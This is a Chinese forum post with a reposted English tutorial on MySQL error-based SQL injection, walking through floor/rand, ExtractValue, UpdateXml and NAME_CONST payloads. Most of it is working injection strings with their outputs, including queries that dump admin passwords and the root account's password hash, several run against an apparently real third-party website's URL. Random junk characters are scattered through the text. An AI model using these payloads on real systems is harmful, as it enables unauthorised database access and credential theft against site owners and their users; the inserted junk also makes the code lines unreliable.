找回密码
 立即注册
查看: 3243|回复: 0
打印 上一主题 下一主题

mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2015-11-11 19:03:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:* B) }3 d, D$ P& L1 D" |
首先进行正常查询:

mysql> select * from article where id = 1;
  Y& Y6 |8 Y- t' p6 o& Z% B+—-+——-+———+- K" n  |( {( N- Q9 s$ P3 _8 r. r
| id | title | content |
' e3 m# P1 O% P* b0 Q+—-+——-+———+# T1 ?  |/ S! L7 p  N  c8 m( ~
|  1 | test  | do it   |! {5 f5 V+ ]2 g6 r( N- x/ t
+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
1 r; P9 ]% {2 w* vERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。: X& R. d* W+ T$ U) n
例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);2 X7 m# v, i% ?  e; Q( o
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
6 k7 _/ v2 N* N, D! kERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue. z# d+ G) V6 g; g6 S3 `
测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
) E% n3 H. _% e6 `# FERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

$ ?( W( c! S% G# K8 e' I

4 F4 U. j( I( W9 R4 |3 N* F

再收集:

5 J7 q& n% u7 [' N5 z# Z8 f
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
1 o4 O" R$ I0 E0 E1 j) _
: |( T* K- Z( E' ^Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’6 |" C7 ]6 d3 [' K. Q

& P, M, [) W; h7 P2 F# Hhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
; K2 U7 Z# v' V- ^/ D0 r% _4 P
, j  z0 b4 _1 Y: l- N% L  \9 [Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ 3 U& ], h7 n0 m& d. h8 l, V; q
+ y2 |  x0 h' g: ?9 j: Z: V! c" Y- o
MYSQL高版本报错注入技巧-利用NAME_CONST注入
6 N) J2 O$ d/ O$ f+ }" zIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. 9 h, }5 H% n: w  z1 R) s, ?* d- Z( x
% T2 {2 W( ]  O$ w5 Z
+ e! `- G3 \: {
相关信息. b7 e; X& V9 G3 o5 R
0 [$ b! p7 T  \8 E
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that./ E9 C7 t) `' W
  [( ~7 J8 [$ u& D+ N1 h, R
Code:" U$ B/ C4 \* `8 Q
NAME_CONST(DATA, VALUE)
$ k1 v( w1 i+ n$ t/ ?) c( u+ c
- Q. [. m; r6 i+ pReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.' t- a- q' f1 ?- ]4 l4 K
+ I* P& y% v% n2 P; K$ q' ^
SELECT NAME_CONST('TEST', 1)
9 h; V; P+ v0 ?
: T+ C) y: V6 g+ C$ v; K0 _5 X
4 C( t! G: k+ c+ i: o6 [$ g
' n' u# k9 s# S! K* R& p|---------------|  I/ q$ K7 i5 Q1 `. W) B
|     TEST      |- R. y* E& W+ D- x- W: i6 z
|               |( b' Q& Z% d0 }- q
|---------------|
, c8 C! c0 S1 \|       1       |9 j1 N/ r. B; W
|               |
2 ?: g1 u8 C0 V  T|---------------|6 |8 |* ^' R7 V) z* R9 I

, l: h1 |% E! I8 E: T/ k, S: K
0 `0 [1 J% s9 q1 i; K4 D9 X  S. g' n7 `+ b/ H
/ u  J* c$ t& p& U9 ^3 `, ~
http://dev.mysql.com/doc/refman/5.0/en/m...name-const, h; ]% H  Q4 U$ k6 L# N% r
Intro to MySQL Variables1 [3 z5 _% E6 p$ n6 I

( K0 z3 a. `! N1 X3 wOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
+ }- @& t/ T# m4 G9 Z
: a1 v# \4 E! i; Z! cCode:4 x* A. x9 N) x) s7 X
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
8 S; y7 a  b7 |; t0 K# }, J9 c! M) ?! P( \4 l1 T
# v9 ]- F/ C+ V$ D9 N

# w! U  [. [; A; T; O6 }& R* X

/ `- b; e7 }( M2 J. p+ O4 |7 l+ |
- u+ y1 r5 \: q/ s7 R! BCode:
8 |+ w# f) u3 V! rand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--# u* v6 w: e0 {% n- l2 b

4 Q$ h3 ]8 Q  C3 B
& I, s  o( m! g( G6 _1 \VAR = Your MySQL variable.3 f& y7 I6 S- f

3 e* C; i- i# i0 y! YMySQL 5.1.3 Server System Variables
$ S4 `" O* O7 ]8 v- e5 A" H' N9 p! ]$ S8 w; N
Let's try it out on my site..6 X+ n: a, _- e/ Y7 A+ Q) o8 E/ U

$ M1 ]" m, `8 i8 ]Code:
# e) ^( ]+ d9 V! a  @http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--6 T# q( c* D) p0 h& H. Q

: S9 v8 `" {" uErroruplicate column name '5.0.27-community-nt'0 Q) _9 {- G' h" b

  d9 Q% ]5 G, \
6 I0 s6 g: Z% |  u' i' A: c; ^3 t' d1 W& |/ N4 W- V/ R
7 h. j  @9 F8 Z0 m, I* X$ @" S

0 z% r, J8 ~1 C2 k! T2 ?Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...0 z$ y) T" l# D& C

3 Q0 _7 u7 W# GData Extraction- T) _4 U, G6 Q7 w2 @8 ~

! k/ |6 ~1 r1 Q6 K6 s/ sCode:
: p- E) u% h! {, Q. K% e+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
% M$ j& g  e0 B3 |3 |
4 {; J* \" K5 m7 \: |, p/ ?7 b

5 V9 _3 c/ ]4 ?7 S0 N* ~7 C3 S: ^We should get a duplicate column 1 error...
8 W+ ]& t6 F- D$ ~4 W
2 J# r$ \5 I2 `! U- C0 KCode:8 Q4 I/ @% o9 m7 F$ A
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
4 u, X( H  S+ s, B1 k; R) L5 |1 l
$ [6 H! a) E9 k% Q, wErroruplicate column name '1" n& Z; e6 t# b2 F- b$ X- h
& ~& }2 j! w; q; C1 z( C% s; y
7 v" U: C4 ]0 Q# s( X: R

3 L: c. X- l! m% i6 K" [
; o+ o" w& C# p2 Z- F) k) t
+ ~" ~6 T. C- y) Z
9 ?9 Z5 a4 c. V) |& x
Now let's get the tables out this bitch..
4 `) l. e3 f1 J( U. X
0 F9 }/ }: z  T: y: nCode:
, D* S1 n1 K7 A% t9 V# w/ g7 P1 B+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
+ S$ v" [$ R3 i! w1 g0 k# ^
; Z/ h+ N: N' P0 l& R

* v* |7 j3 r/ E7 |; {. jLet's see if it works here, if it does, we can go on and finish the job.; N. a$ e8 f# b. k2 H; Z% G7 |

& W, u; q; ]% L3 v) P1 F1 @! NCode:; K1 q4 t$ B0 B# `! d# Y1 h
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
0 k! c0 K7 J1 \. I+ }6 ]# @8 v5 t9 I  n' \! t* B" S% s. x
' m# k  @# h1 E8 j5 t0 J7 C. [
Erroruplicate column name 'com_admanage
& s, u  l& Q  }) \# s( u
, I7 w0 Z& B: ]: \- y
, ?% P6 y: B1 C  m! ^+ A' t% [- l3 E

/ \( `; j3 m7 Y. Y( W9 V, f+ `
& @  l: C" d3 h5 g. B1 i7 e
7 J! T! Y; X/ D

; R) t4 U/ d2 ?7 w6 |! _0 L: MNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.; c8 Q: m0 u1 h

+ h; C* q$ o9 X) c9 {Let's get the columns out of the user table..
; s- ~' Z: d4 J7 @! U; n3 U. r4 d
1 E" u! V# M% K7 O$ pCode:; L% F& k4 |& R  T. ]- q9 {( s6 X- h
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--4 v, w% e2 ]* g( y
( _% e# U$ Z! Z/ I! `4 Z
7 T  u3 {! G" g. b; j- Q5 i% f* r5 \
So mine looks like this, and I get the duplicate column name 'Host'.
3 Z8 T) j9 {3 u9 A
* O9 A9 ?  G! \2 y8 q* {Code:4 ^$ m9 T+ ^7 ?# L) F% o
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--$ ^( Z+ H8 f4 @! K4 g( b* C
0 x) t7 w! J- [8 f9 n$ ~+ o) {+ {' _
Erroruplicate column name 'Host'
4 W: D: k) Q: F6 ?% P! a
( {$ p4 W8 K: h5 h) O# R. J

! ]4 N- @8 P9 g! m! v% [6 X5 Q7 @7 a+ L4 o2 @5 [+ g! i7 B5 V
; K. J9 ^' Q% o+ B" p6 n8 `
/ j) O/ t8 d9 j/ B0 {
  x) v9 l7 z- t" _5 s1 w. P
Woot, time to finish this bitch off.
* G/ F" N% h; _9 e9 P, A
: r( U1 N& V) h; s5 jCode:* F4 Z$ v8 U, \; w% x3 `
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--+ d5 z8 m" S; a+ D
* o' @! y) `% o, q6 R( }2 K
: ]7 {; U+ s$ ~- O' E
So mine looks like this...
3 \3 t& V! q6 c) K2 ~6 y5 k
, h: U( V! h$ m9 w1 L* c6 oCode:
: o3 {  r# l- Dhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
5 H# Z  T0 L2 z# a& S) F
8 ^# a  K! c2 c4 Y/ OErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'# x: }# _, u4 z: Q+ X: a& E  u) M# L: r

: N# G+ X9 I& n2 y: s. c5 ~0 ~2 g/ M$ a2 T) o3 J# Q

0 _" L2 r, ~+ h1 m! b  F( Z- Y1 v# L; \0 j& z$ ?9 @% G: W
. @+ r- n2 |5 O3 Y5 }8 O
* o: n( }4 ?9 `
And there we have it, thanks for reading.

4 ]8 J( g: x! b4 W2 N4 E/ m1 N! C" j2 n9 K
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表